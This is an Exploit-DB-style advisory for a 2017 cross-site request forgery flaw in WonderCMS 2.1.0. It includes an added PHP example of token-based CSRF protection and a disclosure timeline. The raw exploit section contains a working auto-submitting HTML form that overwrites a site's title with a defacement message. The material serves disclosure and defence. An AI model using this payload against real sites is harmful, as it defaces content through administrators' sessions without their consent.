Vendor: WonderCMS
By: Zerox Security Lab
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: WonderCMS
Affected Version From: 2.1.0
Affected Version To: 2.1.0
Patch Exists: YES
Related CWE: N/A
CPE: wondercms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2017

Cross-Site Request Forgery in WonderCMS

WonderCMS is a free open source Content Management System; in other words, it is a free website builder. WonderCMS doesn't require any configuration and can simply be unzipped and uploaded to your hosting provider. The database is a text file which you can copy, move, back up and restore easily. Because the page-edit request is not protected against cross-site request forgery, an attacker can exploit this vulnerability by crafting a malicious HTML form that is submitted to the vulnerable application from the browser of a logged-in administrator. This form can be used to modify the content of the website.

Mitigation:

Upgrade to WonderCMS 2.2.0 or later
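
The server-side check that closes this class of bug, shown as an added example (illustrative code written for this page, not WonderCMS's own handler and not the 2.2.0 patch): every state-changing POST must carry a per-session token that only the site's own pages can embed, so an auto-submitting form hosted on another origin, like the PoC form in the raw data below, is rejected with 403. The field names fieldname, content and target are taken from that PoC form; handle_save(), csrf_token_valid(), the token field name and the whitelist of editable fields are assumptions.

```php
<?php
// Added example, not WonderCMS code: a minimal page-edit endpoint guarded
// by a per-session CSRF token. fieldname/content/target mirror the PoC form;
// handle_save(), csrf_token_valid() and the "token" field are hypothetical.

// Defense in depth (PHP 7.3+): a Lax SameSite session cookie is not sent on
// cross-site top-level POSTs, so a forged form arrives unauthenticated.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Issue one unguessable token per session and keep it server side.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Compare the submitted token with the session token in constant time.
// $submitted is left untyped because $_POST may deliver an array (token[]=x).
function csrf_token_valid($submitted, string $expected): bool
{
    return is_string($submitted) && hash_equals($expected, $submitted);
}

// Apply an edit only when the request proves it came from our own form.
// Returns true when the change was saved, false when it was rejected.
function handle_save(array $post, string $session_token): bool
{
    if (!csrf_token_valid($post['token'] ?? null, $session_token)) {
        http_response_code(403);          // another origin cannot read the token
        return false;
    }
    $allowed = ['title', 'content'];       // assumed whitelist of editable fields
    if (!in_array($post['fieldname'] ?? '', $allowed, true)) {
        http_response_code(400);
        return false;
    }
    // ... write $post['content'] into $post['target'] in the flat-file database ...
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    handle_save($_POST, $_SESSION['csrf_token']);
    exit;
}
?>
<!-- The legitimate editor embeds the token; a third-party page cannot obtain it -->
<form action="" method="post">
    <input type="hidden" name="token"
           value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) ?>">
    <input name="fieldname" value="title">
    <input name="content" value="">
    <input name="target" value="pages">
    <input type="submit" value="Save">
</form>
```

The token check is the actual fix; the SameSite attribute only narrows the window (older browsers ignore it, and it does not cover same-site subdomains), so it is layered on top rather than used alone. hash_equals() avoids the timing side channel a plain string comparison would leave.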

Exploit-DB raw data:

<!--
# Exploit Title: Cross-Site Request Forgery in WonderCMS
# Date: 2017-06-19
# Exploit Author: Zerox Security Lab
# Software Link: https://www.wondercms.com
# Version: 2.1.0
# Twitter: https://twitter.com/ZeroxSecLab

0xCode Lab ID:
---------------
0xC-201706-002

Introduction:
-------------
WonderCMS is a free open source Content Management System. In other
words, WonderCMS is a free website builder.
WonderCMS doesn't require any configuration and can be simply unzipped
and uploaded to your hosting provider. The database is a text file
which you can copy, move, backup and restore easily.

Proof of Concept (PoC):
------------------------
-->
<html>
<body>
<form action="http://localhost/wonder/" method="post">
	<input name="fieldname" value="title">
	<input name="content" value="Hacked By 0xCode Security Lab">
	<input name="target" value="pages">
	<input type="submit" value="ok">
</form>
</body>
</html>
<script>
	document.forms[0].submit();
</script>
<!--
Disclosure Timeline:
---------------------
2017-06-16: Vulnerability found.
2017-06-17: Reported to vendor.
2017-06-17: Vendor responded and sent a new version to test.
2017-06-17: Tested the new version; vulnerability patched successfully.
2017-06-18: Vendor responded, update released.
2017-06-19: Public Disclosure.

Fix:
----
This issue is fixed in WonderCMS 2.2.0

References:
------------
https://www.wondercms.com/whatsnew
https://www.wondercms.com/forum/viewtopic.php?f=8&t=885
https://github.com/robiso/wondercms/issues/36

Credits & Authors:
------------------
Zerox Security Lab
-->